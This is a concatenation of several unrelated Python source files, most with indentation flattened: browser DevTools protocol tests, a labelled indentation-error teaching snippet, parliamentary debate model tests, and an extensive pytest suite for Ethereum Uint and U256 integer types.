proto_descriptor = await CDP.Protocol()
pv = proto_descriptor["version"]
major, minor = version["Protocol-Version"].split(".")
assert pv["major"] == major
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_create_activate_and_close_a_target(self, frontend_url: Any):
nt_url = "http://example.com"
if frontend_url is not None:
new_target = await CDP.New(frontend_url=frontend_url, url=nt_url)
else:
new_target = await CDP.New(url=nt_url)
assert new_target["id"] is not None
if frontend_url is not None:
targets = await CDP.List(frontend_url=frontend_url)
else:
targets = await CDP.List()
target_listed = False
for target in targets:
if target["id"] == new_target["id"]:
target_listed = True
break
assert target_listed
if frontend_url is not None:
activate_results = await CDP.Activate(
frontend_url=frontend_url, target_id=new_target["id"]
)
close_results = await CDP.Close(
frontend_url=frontend_url, target_id=new_target["id"]
)
else:
activate_results = await CDP.Activate(target_id=new_target["id"])
close_results = await CDP.Close(target_id=new_target["id"])
assert activate_results == (200, "Target activated")
assert close_results == (200, "Target is closing")
# Source: Pytest/helloWord.py (qingaoti/Trainer, MIT)
if True:
    print ("Answer")
    print ("True")
else:
    print ("Answer")
  print ("False")  # Inconsistent indentation here causes an IndentationError at runtime
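The snippet above is a deliberate negative example: the final `print` is indented differently from the rest of its block, so Python rejects the file before running it. For contrast, a version with one consistent indentation level per block runs cleanly and prints `Answer` then `True` (the condition is literally `True`):

```python
# Same logic, with consistent four-space indentation in both branches.
if True:
    print("Answer")
    print("True")
else:
    print("Answer")
    print("False")
```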
# Source: test/models/test_debate_section.py (RobertLucey/oireachtas-data, Unlicense)
from unittest import TestCase
from oireachtas_data.models.debate_section import DebateSection
class DebateSectionTest(TestCase):
def test_parse(self):
self.assertEqual(
DebateSection.parse(
{
'bill': None,
'contains_debate': True,
'counts': {
'speakerCount': 1,
'speechCount': 1
},
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'data_uri': 'https://something123919230192.com',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': [],
'loaded': False
}
).serialize(),
{
'bill': None,
'contains_debate': True,
'counts': {'speakerCount': 1, 'speechCount': 1},
'data_uri': 'https://something123919230192.com',
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': []
}
)
def test_serialize(self):
self.assertEqual(
DebateSection(
**{
'bill': None,
'contains_debate': True,
'counts': {
'speakerCount': 1,
'speechCount': 1
},
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'data_uri': 'https://something123919230192.com',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': [],
'loaded': False
}
).serialize(),
{
'bill': None,
'contains_debate': True,
'counts': {'speakerCount': 1, 'speechCount': 1},
'data_uri': 'https://something123919230192.com',
'debate_section_id': 'dbsect_11',
'debate_type': 'debate',
'parent_debate_section': None,
'show_as': 'something',
'speakers': [],
'speeches': []
}
)
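Both tests assert the same round-trip property: building a `DebateSection` from a dict (via `parse` or the constructor) and calling `serialize()` returns the input minus the transient `loaded` flag. A hypothetical minimal stand-in (not the real `oireachtas_data` class) illustrating that pattern:

```python
# MiniSection is a hypothetical stand-in for DebateSection, showing the
# parse() -> serialize() round-trip the tests above assert.
class MiniSection:
    FIELDS = ('bill', 'contains_debate', 'counts', 'data_uri',
              'debate_section_id', 'debate_type', 'parent_debate_section',
              'show_as', 'speakers', 'speeches')

    def __init__(self, **kwargs):
        for field in self.FIELDS:
            setattr(self, field, kwargs.get(field))
        # 'loaded' is accepted on input but intentionally not serialized.
        self.loaded = kwargs.get('loaded', False)

    @classmethod
    def parse(cls, data):
        return cls(**data)

    def serialize(self):
        return {field: getattr(self, field) for field in self.FIELDS}


data = {
    'bill': None, 'contains_debate': True,
    'counts': {'speakerCount': 1, 'speechCount': 1},
    'data_uri': 'https://example.com', 'debate_section_id': 'dbsect_11',
    'debate_type': 'debate', 'parent_debate_section': None,
    'show_as': 'something', 'speakers': [], 'speeches': [], 'loaded': False,
}
round_tripped = MiniSection.parse(data).serialize()
assert round_tripped == {k: v for k, v in data.items() if k != 'loaded'}
```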
# File: temp.py | repo: RAVURISREESAIHARIKRISHNA/Python-2.7.12-3.5.2- @ b2626a5 | license: MIT
print("Hello Python 3.5.2")
# File: src/test_lib/__init__.py | repo: abood293/razan @ bc6b54a | license: MIT
from .my_class import MyClass
# File: forty/views/__init__.py | repo: vikian050194/forty @ 7ef68fb | license: MIT
from .base import *
from .log import *
from .status import *
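A package `__init__` that re-exports with `from … import *`, as above, binds whatever each submodule's `__all__` lists, or every public (non-underscore) name when `__all__` is absent. A stdlib-only sketch using a hypothetical in-memory module:

```python
import types

# Hypothetical in-memory module standing in for a submodule like `.base`.
base = types.ModuleType("base")
exec(
    "__all__ = ['Visible']\n"
    "class Visible: pass\n"
    "class _Hidden: pass\n"
    "class AlsoPublic: pass\n",
    base.__dict__,
)

# What `from base import *` would bind: __all__ wins when it is present,
# so AlsoPublic is excluded despite being a public name.
star_names = getattr(
    base, "__all__",
    [n for n in dir(base) if not n.startswith("_")],
)
print(sorted(star_names))  # ['Visible']
```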
# File: tests/test_base_types.py | repo: fulldecent/eth1.0-specs @ ab60d58 | license: CC0-1.0
import pytest
from ethereum.base_types import U256, U256_MAX_VALUE, Uint
def test_uint_new() -> None:
value = Uint(5)
assert isinstance(value, int)
assert isinstance(value, Uint)
assert value == 5
def test_uint_new_negative() -> None:
with pytest.raises(ValueError):
Uint(-5)
def test_uint_new_float() -> None:
with pytest.raises(TypeError):
Uint(0.1) # type: ignore
def test_uint_radd() -> None:
value = 4 + Uint(5)
assert isinstance(value, Uint)
assert value == 9
def test_uint_radd_negative() -> None:
with pytest.raises(ValueError):
(-4) + Uint(5)
def test_uint_radd_float() -> None:
value = (1.0) + Uint(5)
assert not isinstance(value, int)
assert value == 6.0
def test_uint_add() -> None:
value = Uint(5) + 4
assert isinstance(value, Uint)
assert value == 9
def test_uint_add_negative() -> None:
with pytest.raises(ValueError):
Uint(5) + (-4)
def test_uint_add_float() -> None:
value = Uint(5) + (1.0)
assert not isinstance(value, int)
assert value == 6.0
def test_uint_iadd() -> None:
value = Uint(5)
value += 4
assert isinstance(value, Uint)
assert value == 9
def test_uint_iadd_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value += -4
def test_uint_iadd_float() -> None:
value = Uint(5)
value += 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 6.0
def test_uint_rsub() -> None:
value = 6 - Uint(5)
assert isinstance(value, Uint)
assert value == 1
def test_uint_rsub_too_big() -> None:
with pytest.raises(ValueError):
6 - Uint(7)
def test_uint_rsub_negative() -> None:
with pytest.raises(ValueError):
(-4) - Uint(5)
def test_uint_rsub_float() -> None:
value = (6.0) - Uint(5)
assert not isinstance(value, int)
assert value == 1.0
def test_uint_sub() -> None:
value = Uint(5) - 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_sub_too_big() -> None:
with pytest.raises(ValueError):
Uint(5) - 6
def test_uint_sub_negative() -> None:
with pytest.raises(ValueError):
Uint(5) - (-4)
def test_uint_sub_float() -> None:
value = Uint(5) - (1.0)
assert not isinstance(value, int)
assert value == 4.0
def test_uint_isub() -> None:
value = Uint(5)
value -= 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_isub_too_big() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value -= 6
def test_uint_isub_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value -= -4
def test_uint_isub_float() -> None:
value = Uint(5)
value -= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 4.0
def test_uint_rmul() -> None:
value = 4 * Uint(5)
assert isinstance(value, Uint)
assert value == 20
def test_uint_rmul_negative() -> None:
with pytest.raises(ValueError):
(-4) * Uint(5)
def test_uint_rmul_float() -> None:
value = (1.0) * Uint(5)
assert not isinstance(value, int)
assert value == 5.0
def test_uint_mul() -> None:
value = Uint(5) * 4
assert isinstance(value, Uint)
assert value == 20
def test_uint_mul_negative() -> None:
with pytest.raises(ValueError):
Uint(5) * (-4)
def test_uint_mul_float() -> None:
value = Uint(5) * (1.0)
assert not isinstance(value, int)
assert value == 5.0
def test_uint_imul() -> None:
value = Uint(5)
value *= 4
assert isinstance(value, Uint)
assert value == 20
def test_uint_imul_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value *= -4
def test_uint_imul_float() -> None:
value = Uint(5)
value *= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 5.0
def test_uint_floordiv() -> None:
value = Uint(5) // 2
assert isinstance(value, Uint)
assert value == 2
def test_uint_floordiv_negative() -> None:
with pytest.raises(ValueError):
Uint(5) // -2
def test_uint_floordiv_float() -> None:
value = Uint(5) // 2.0
assert not isinstance(value, Uint)
assert value == 2
def test_uint_rfloordiv() -> None:
value = 5 // Uint(2)
assert isinstance(value, Uint)
assert value == 2
def test_uint_rfloordiv_negative() -> None:
with pytest.raises(ValueError):
(-2) // Uint(5)
def test_uint_rfloordiv_float() -> None:
value = 5.0 // Uint(2)
assert not isinstance(value, Uint)
assert value == 2
def test_uint_ifloordiv() -> None:
value = Uint(5)
value //= 2
assert isinstance(value, Uint)
assert value == 2
def test_uint_ifloordiv_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value //= -2
def test_uint_rmod() -> None:
value = 6 % Uint(5)
assert isinstance(value, Uint)
assert value == 1
def test_uint_rmod_negative() -> None:
with pytest.raises(ValueError):
(-4) % Uint(5)
def test_uint_rmod_float() -> None:
value = (6.0) % Uint(5)
assert not isinstance(value, int)
assert value == 1.0
def test_uint_mod() -> None:
value = Uint(5) % 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_mod_negative() -> None:
with pytest.raises(ValueError):
Uint(5) % (-4)
def test_uint_mod_float() -> None:
value = Uint(5) % (1.0)
assert not isinstance(value, int)
assert value == 0.0
def test_uint_imod() -> None:
value = Uint(5)
value %= 4
assert isinstance(value, Uint)
assert value == 1
def test_uint_imod_negative() -> None:
value = Uint(5)
with pytest.raises(ValueError):
value %= -4
def test_uint_imod_float() -> None:
value = Uint(5)
value %= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 0.0
def test_uint_divmod() -> None:
quotient, remainder = divmod(Uint(5), 2)
assert isinstance(quotient, Uint)
assert isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_divmod_negative() -> None:
with pytest.raises(ValueError):
divmod(Uint(5), -2)
def test_uint_divmod_float() -> None:
quotient, remainder = divmod(Uint(5), 2.0)
assert not isinstance(quotient, Uint)
assert not isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_rdivmod() -> None:
quotient, remainder = divmod(5, Uint(2))
assert isinstance(quotient, Uint)
assert isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_rdivmod_negative() -> None:
with pytest.raises(ValueError):
divmod(-5, Uint(2))
def test_uint_rdivmod_float() -> None:
quotient, remainder = divmod(5.0, Uint(2))
assert not isinstance(quotient, Uint)
assert not isinstance(remainder, Uint)
assert quotient == 2
assert remainder == 1
def test_uint_pow() -> None:
value = Uint(3) ** 2
assert isinstance(value, Uint)
assert value == 9
def test_uint_pow_negative() -> None:
with pytest.raises(ValueError):
Uint(3) ** -2
def test_uint_pow_modulo() -> None:
value = pow(Uint(4), 2, 3)
assert isinstance(value, Uint)
assert value == 1
def test_uint_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
pow(Uint(4), 2, -3)
def test_uint_rpow() -> None:
value = 3 ** Uint(2)
assert isinstance(value, Uint)
assert value == 9
def test_uint_rpow_negative() -> None:
with pytest.raises(ValueError):
(-3) ** Uint(2)
def test_uint_rpow_modulo() -> None:
value = Uint.__rpow__(Uint(2), 4, 3)
assert isinstance(value, int)
assert value == 1
def test_uint_rpow_modulo_negative() -> None:
with pytest.raises(ValueError):
Uint.__rpow__(Uint(2), 4, -3)
def test_uint_ipow() -> None:
value = Uint(3)
value **= 2
assert isinstance(value, Uint)
assert value == 9
def test_uint_ipow_negative() -> None:
value = Uint(3)
with pytest.raises(ValueError):
value **= -2
def test_uint_ipow_modulo() -> None:
value = Uint(4).__ipow__(2, 3)
assert isinstance(value, Uint)
assert value == 1
def test_uint_ipow_modulo_negative() -> None:
with pytest.raises(ValueError):
Uint(4).__ipow__(2, -3)
def test_uint_to_be_bytes_zero() -> None:
encoded = Uint(0).to_be_bytes()
assert encoded == bytes([])
def test_uint_to_be_bytes_one() -> None:
encoded = Uint(1).to_be_bytes()
assert encoded == bytes([1])
def test_uint_to_be_bytes_is_big_endian() -> None:
encoded = Uint(0xABCD).to_be_bytes()
assert encoded == bytes([0xAB, 0xCD])
def test_uint_to_be_bytes32_zero() -> None:
encoded = Uint(0).to_be_bytes32()
assert encoded == bytes([0] * 32)
def test_uint_to_be_bytes32_one() -> None:
encoded = Uint(1).to_be_bytes32()
assert encoded == bytes([0] * 31 + [1])
def test_uint_to_be_bytes32_max_value() -> None:
encoded = Uint(2 ** 256 - 1).to_be_bytes32()
assert encoded == bytes(
[
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
]
)
def test_uint_from_be_bytes_empty() -> None:
value = Uint.from_be_bytes(b"")
assert value == 0
def test_uint_from_be_bytes_one() -> None:
value = Uint.from_be_bytes(bytes([1]))
assert value == 1
def test_uint_from_be_bytes_is_big_endian() -> None:
value = Uint.from_be_bytes(bytes([0xAB, 0xCD]))
assert value == 0xABCD
def test_u256_new() -> None:
value = U256(5)
assert isinstance(value, int)
assert isinstance(value, U256)
assert value == 5
def test_u256_new_negative() -> None:
with pytest.raises(ValueError):
U256(-5)
def test_u256_new_float() -> None:
with pytest.raises(TypeError):
U256(0.1) # type: ignore
def test_u256_new_max_value() -> None:
value = U256(2 ** 256 - 1)
assert isinstance(value, U256)
assert value == 2 ** 256 - 1
def test_u256_new_too_large() -> None:
with pytest.raises(ValueError):
U256(2 ** 256)
def test_u256_radd() -> None:
value = 4 + U256(5)
assert isinstance(value, U256)
assert value == 9
def test_u256_radd_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256 - 1) + U256(5)
def test_u256_radd_negative() -> None:
with pytest.raises(ValueError):
(-4) + U256(5)
def test_u256_radd_float() -> None:
value = (1.0) + U256(5)
assert not isinstance(value, int)
assert value == 6.0
def test_u256_add() -> None:
value = U256(5) + 4
assert isinstance(value, U256)
assert value == 9
def test_u256_add_overflow() -> None:
with pytest.raises(ValueError):
U256(5) + (2 ** 256 - 1)
def test_u256_add_negative() -> None:
with pytest.raises(ValueError):
U256(5) + (-4)
def test_u256_add_float() -> None:
value = U256(5) + (1.0)
assert not isinstance(value, int)
assert value == 6.0
def test_u256_wrapping_add() -> None:
value = U256(5).wrapping_add(4)
assert isinstance(value, U256)
assert value == 9
def test_u256_wrapping_add_overflow() -> None:
value = U256(5).wrapping_add(2 ** 256 - 1)
assert isinstance(value, U256)
assert value == 4
def test_u256_wrapping_add_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_add(-4)
def test_u256_iadd() -> None:
value = U256(5)
value += 4
assert isinstance(value, U256)
assert value == 9
def test_u256_iadd_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value += -4
def test_u256_iadd_float() -> None:
value = U256(5)
value += 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 6.0
def test_u256_iadd_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value += 2 ** 256 - 1
def test_u256_rsub() -> None:
value = 5 - U256(4)
assert isinstance(value, U256)
assert value == 1
def test_u256_rsub_underflow() -> None:
with pytest.raises(ValueError):
(0) - U256(1)
def test_u256_rsub_negative() -> None:
with pytest.raises(ValueError):
(-4) - U256(5)
def test_u256_rsub_float() -> None:
value = (5.0) - U256(1)
assert not isinstance(value, int)
assert value == 4.0
def test_u256_sub() -> None:
value = U256(5) - 4
assert isinstance(value, U256)
assert value == 1
def test_u256_sub_underflow() -> None:
with pytest.raises(ValueError):
U256(5) - 6
def test_u256_sub_negative() -> None:
with pytest.raises(ValueError):
U256(5) - (-4)
def test_u256_sub_float() -> None:
value = U256(5) - (1.0)
assert not isinstance(value, int)
assert value == 4.0
def test_u256_wrapping_sub() -> None:
value = U256(5).wrapping_sub(4)
assert isinstance(value, U256)
assert value == 1
def test_u256_wrapping_sub_underflow() -> None:
value = U256(5).wrapping_sub(6)
assert isinstance(value, U256)
assert value == 2 ** 256 - 1
def test_u256_wrapping_sub_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_sub(-4)
def test_u256_isub() -> None:
value = U256(5)
value -= 4
assert isinstance(value, U256)
assert value == 1
def test_u256_isub_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value -= -4
def test_u256_isub_float() -> None:
value = U256(5)
value -= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 4.0
def test_u256_isub_underflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value -= 6
def test_u256_rmul() -> None:
value = 4 * U256(5)
assert isinstance(value, U256)
assert value == 20
def test_u256_rmul_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256 - 1) * U256(5)
def test_u256_rmul_negative() -> None:
with pytest.raises(ValueError):
(-4) * U256(5)
def test_u256_rmul_float() -> None:
value = (1.0) * U256(5)
assert not isinstance(value, int)
assert value == 5.0
def test_u256_mul() -> None:
value = U256(5) * 4
assert isinstance(value, U256)
assert value == 20
def test_u256_mul_overflow() -> None:
with pytest.raises(ValueError):
U256.MAX_VALUE * 4
def test_u256_mul_negative() -> None:
with pytest.raises(ValueError):
U256(5) * (-4)
def test_u256_mul_float() -> None:
value = U256(5) * (1.0)
assert not isinstance(value, int)
assert value == 5.0
def test_u256_wrapping_mul() -> None:
value = U256(5).wrapping_mul(4)
assert isinstance(value, U256)
assert value == 20
def test_u256_wrapping_mul_overflow() -> None:
value = U256.MAX_VALUE.wrapping_mul(4)
assert isinstance(value, U256)
assert (
value
== 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC
)
def test_u256_wrapping_mul_negative() -> None:
with pytest.raises(ValueError):
U256(5).wrapping_mul(-4)
def test_u256_imul() -> None:
value = U256(5)
value *= 4
assert isinstance(value, U256)
assert value == 20
def test_u256_imul_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= -4
def test_u256_imul_arg_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= 2 ** 256
def test_u256_imul_float() -> None:
value = U256(5)
value *= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 5.0
def test_u256_imul_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value *= 2 ** 256 - 1
def test_u256_floordiv() -> None:
value = U256(5) // 2
assert isinstance(value, U256)
assert value == 2
def test_u256_floordiv_overflow() -> None:
with pytest.raises(ValueError):
U256(5) // (2 ** 256)
def test_u256_floordiv_negative() -> None:
with pytest.raises(ValueError):
U256(5) // -2
def test_u256_floordiv_float() -> None:
value = U256(5) // 2.0
assert not isinstance(value, U256)
assert value == 2
def test_u256_rfloordiv() -> None:
value = 5 // U256(2)
assert isinstance(value, U256)
assert value == 2
def test_u256_rfloordiv_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256) // U256(2)
def test_u256_rfloordiv_negative() -> None:
with pytest.raises(ValueError):
(-2) // U256(5)
def test_u256_rfloordiv_float() -> None:
value = 5.0 // U256(2)
assert not isinstance(value, U256)
assert value == 2
def test_u256_ifloordiv() -> None:
value = U256(5)
value //= 2
assert isinstance(value, U256)
assert value == 2
def test_u256_ifloordiv_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value //= -2
def test_u256_ifloordiv_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value //= 2 ** 256
def test_u256_rmod() -> None:
value = 6 % U256(5)
assert isinstance(value, U256)
assert value == 1
def test_u256_rmod_float() -> None:
value = (6.0) % U256(5)
assert not isinstance(value, int)
assert value == 1.0
def test_u256_mod() -> None:
value = U256(5) % 4
assert isinstance(value, U256)
assert value == 1
def test_u256_mod_overflow() -> None:
with pytest.raises(ValueError):
U256(5) % (2 ** 256)
def test_u256_mod_negative() -> None:
with pytest.raises(ValueError):
U256(5) % (-4)
def test_u256_mod_float() -> None:
value = U256(5) % (1.0)
assert not isinstance(value, int)
assert value == 0.0
def test_u256_imod() -> None:
value = U256(5)
value %= 4
assert isinstance(value, U256)
assert value == 1
def test_u256_imod_overflow() -> None:
value = U256(5)
with pytest.raises(ValueError):
value %= 2 ** 256
def test_u256_imod_negative() -> None:
value = U256(5)
with pytest.raises(ValueError):
value %= -4
def test_u256_imod_float() -> None:
value = U256(5)
value %= 1.0 # type: ignore
assert not isinstance(value, int)
assert value == 0.0
def test_u256_divmod() -> None:
quotient, remainder = divmod(U256(5), 2)
assert isinstance(quotient, U256)
assert isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_divmod_overflow() -> None:
with pytest.raises(ValueError):
divmod(U256(5), 2 ** 256)
def test_u256_divmod_negative() -> None:
with pytest.raises(ValueError):
divmod(U256(5), -2)
def test_u256_divmod_float() -> None:
quotient, remainder = divmod(U256(5), 2.0)
assert not isinstance(quotient, U256)
assert not isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_rdivmod() -> None:
quotient, remainder = divmod(5, U256(2))
assert isinstance(quotient, U256)
assert isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_rdivmod_overflow() -> None:
with pytest.raises(ValueError):
divmod(2 ** 256, U256(2))
def test_u256_rdivmod_negative() -> None:
with pytest.raises(ValueError):
divmod(-5, U256(2))
def test_u256_rdivmod_float() -> None:
quotient, remainder = divmod(5.0, U256(2))
assert not isinstance(quotient, U256)
assert not isinstance(remainder, U256)
assert quotient == 2
assert remainder == 1
def test_u256_pow() -> None:
value = U256(3) ** 2
assert isinstance(value, U256)
assert value == 9
def test_u256_pow_overflow() -> None:
with pytest.raises(ValueError):
U256(340282366920938463463374607431768211456) ** 3
def test_u256_pow_negative() -> None:
with pytest.raises(ValueError):
U256(3) ** -2
def test_u256_pow_modulo() -> None:
value = pow(U256(4), 2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_pow_modulo_overflow() -> None:
with pytest.raises(ValueError):
pow(U256(4), 2, 2 ** 257)
def test_u256_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
pow(U256(4), 2, -3)
def test_u256_rpow() -> None:
value = 3 ** U256(2)
assert isinstance(value, U256)
assert value == 9
def test_u256_rpow_overflow() -> None:
with pytest.raises(ValueError):
(2 ** 256) ** U256(2)
def test_u256_rpow_negative() -> None:
with pytest.raises(ValueError):
(-3) ** U256(2)
def test_u256_rpow_modulo() -> None:
value = U256.__rpow__(U256(2), 4, 3)
assert isinstance(value, int)
assert value == 1
def test_u256_rpow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256.__rpow__(U256(2), 4, 2 ** 256 + 1)
def test_u256_rpow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256.__rpow__(U256(2), 4, -3)
def test_u256_ipow() -> None:
value = U256(3)
value **= 2
assert isinstance(value, U256)
assert value == 9
def test_u256_ipow_overflow() -> None:
value = U256(340282366920938463463374607431768211456)
with pytest.raises(ValueError):
value **= 3
def test_u256_ipow_negative() -> None:
value = U256(3)
with pytest.raises(ValueError):
value **= -2
def test_u256_ipow_modulo() -> None:
value = U256(4).__ipow__(2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_ipow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256(4).__ipow__(2, -3)
def test_u256_ipow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256(4).__ipow__(2, 2 ** 256 + 1)
def test_u256_wrapping_pow() -> None:
value = U256(3).wrapping_pow(2)
assert isinstance(value, U256)
assert value == 9
def test_u256_wrapping_pow_overflow() -> None:
value = U256(340282366920938463463374607431768211455).wrapping_pow(3)
assert isinstance(value, U256)
assert value == 0x2FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
def test_u256_wrapping_pow_negative() -> None:
with pytest.raises(ValueError):
U256(3).wrapping_pow(-2)
def test_u256_wrapping_pow_modulo() -> None:
value = U256(4).wrapping_pow(2, 3)
assert isinstance(value, U256)
assert value == 1
def test_u256_wrapping_pow_modulo_overflow() -> None:
with pytest.raises(ValueError):
U256(4).wrapping_pow(2, 2 ** 256 + 1)
def test_u256_wrapping_pow_modulo_negative() -> None:
with pytest.raises(ValueError):
U256(4).wrapping_pow(2, -3)
def test_u256_to_be_bytes_zero() -> None:
encoded = U256(0).to_be_bytes()
assert encoded == bytes([])
def test_u256_to_be_bytes_one() -> None:
encoded = U256(1).to_be_bytes()
assert encoded == bytes([1])
def test_u256_to_be_bytes_is_big_endian() -> None:
encoded = U256(0xABCD).to_be_bytes()
assert encoded == bytes([0xAB, 0xCD])
def test_u256_to_be_bytes32_zero() -> None:
encoded = U256(0).to_be_bytes32()
assert encoded == bytes([0] * 32)
def test_u256_to_be_bytes32_one() -> None:
encoded = U256(1).to_be_bytes32()
assert encoded == bytes([0] * 31 + [1])
def test_u256_to_be_bytes32_max_value() -> None:
encoded = U256(2 ** 256 - 1).to_be_bytes32()
assert encoded == bytes(
[
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
]
)
def test_u256_from_be_bytes_empty() -> None:
value = U256.from_be_bytes(b"")
assert value == 0
def test_u256_from_be_bytes_one() -> None:
value = U256.from_be_bytes(bytes([1]))
assert value == 1
def test_u256_from_be_bytes_is_big_endian() -> None:
value = U256.from_be_bytes(bytes([0xAB, 0xCD]))
assert value == 0xABCD
def test_u256_from_be_bytes_too_large() -> None:
with pytest.raises(ValueError):
U256.from_be_bytes(bytes([0xFF] * 33))
def test_u256_bitwise_and_successful() -> None:
assert U256(0) & U256(0) == 0
assert U256(2 ** 256 - 1) & U256(2 ** 256 - 1) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) & U256(0) == U256(0)
def test_u256_bitwise_and_fails() -> None:
with pytest.raises(ValueError):
U256(0) & (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) & (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) & -10
def test_u256_bitwise_or_successful() -> None:
assert U256(0) | U256(0) == 0
assert U256(2 ** 256 - 1) | U256(0) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) | U256(2 ** 256 - 1) == U256(2 ** 256 - 1)
assert U256(2 ** 256 - 1) | U256(17) == U256(2 ** 256 - 1)
assert U256(17) | U256(18) == U256(19)
def test_u256_bitwise_or_failed() -> None:
with pytest.raises(ValueError):
U256(0) | (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) | (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) | -10
def test_u256_bitwise_xor_successful() -> None:
assert U256(0) ^ U256(0) == 0
assert U256(2 ** 256 - 1) ^ U256(0) == 2 ** 256 - 1
assert U256(2 ** 256 - 1) ^ U256(2 ** 256 - 1) == U256(0)
assert U256(2 ** 256 - 1) ^ U256(17) == U256(2 ** 256 - 1) - U256(17)
assert U256(17) ^ U256(18) == U256(3)
def test_u256_bitwise_xor_failed() -> None:
with pytest.raises(ValueError):
        U256(0) ^ (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) ^ (2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1) ^ -10
def test_u256_bitwise_rxor_successful() -> None:
assert U256(0).__rxor__(U256(0)) == 0
assert U256(2 ** 256 - 1).__rxor__(U256(0)) == 2 ** 256 - 1
assert U256(2 ** 256 - 1).__rxor__(U256(2 ** 256 - 1)) == U256(0)
assert U256(2 ** 256 - 1).__rxor__(U256(17)) == U256(2 ** 256 - 1) - U256(
17
)
assert U256(17).__rxor__(U256(18)) == U256(3)
def test_u256_bitwise_rxor_failed() -> None:
with pytest.raises(ValueError):
U256(0).__rxor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__rxor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__rxor__(-10)
def test_u256_bitwise_ixor_successful() -> None:
assert U256(0).__ixor__(U256(0)) == 0
assert U256(2 ** 256 - 1).__ixor__(U256(0)) == 2 ** 256 - 1
assert U256(2 ** 256 - 1).__ixor__(U256(2 ** 256 - 1)) == U256(0)
assert U256(2 ** 256 - 1).__ixor__(U256(17)) == U256(2 ** 256 - 1) - U256(
17
)
assert U256(17).__ixor__(U256(18)) == U256(3)
def test_u256_bitwise_ixor_failed() -> None:
with pytest.raises(ValueError):
U256(0).__ixor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__ixor__(2 ** 256)
with pytest.raises(ValueError):
U256(2 ** 256 - 1).__ixor__(-10)
def test_u256_invert() -> None:
assert ~U256(0) == U256_MAX_VALUE
assert ~U256(10) == U256_MAX_VALUE - 10
assert ~U256(2 ** 256 - 1) == 0
def test_u256_rshift() -> None:
assert U256(U256_MAX_VALUE) >> 255 == 1
assert U256(U256_MAX_VALUE) >> 256 == 0
